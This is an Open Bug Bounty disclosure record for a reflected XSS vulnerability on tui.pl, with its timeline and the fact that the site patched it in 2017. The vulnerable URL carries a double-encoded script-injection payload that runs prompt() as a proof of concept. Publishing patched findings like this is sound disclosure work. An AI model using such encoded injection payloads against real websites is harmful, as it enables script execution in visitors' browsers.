tui.pl XSS vulnerability

2016-09-09T20:08:00
ID OBB:180921
Type openbugbounty
Reporter DonkeyJJLove
Modified 2017-07-28T11:07:00

Description

Vulnerable URL:
http://www.tui.pl/narty?q=%3aprice%3ainStockFlag%3atrue%3abyPlane%3aF%3adurationFrom%3a7%3adurationTo%3a7%3actAdult%3a2%3aadditionalType%3aGT03%23TUZ-SKI%3aadditionalType%3aGT03%23TUZ-FIRSTWby91g%253c%252fscript%253e%253cscript%253eprompt%2528%252fOPENBUGBOUNTY%252f%2529%253c%252fscript%253ett1y1&page;=1&pageSize;=30&isGlobalSearch;=true
Details:

Description| Value
---|---
Patched:| Yes, at 28.07.2017
Latest check for patch:| 28.07.2017 11:07 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 21736
VIP website status:| Yes
Check tui.pl SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 9 September, 2016 20:08 GMT
Generic security notifications sent to website owner| 9 September, 2016 20:11 GMT
Vulnerability details disclosed by researcher| 7 October, 2016 20:14 GMT
Vulnerability patched by the website owner| 28 July, 2017 11:07 GMT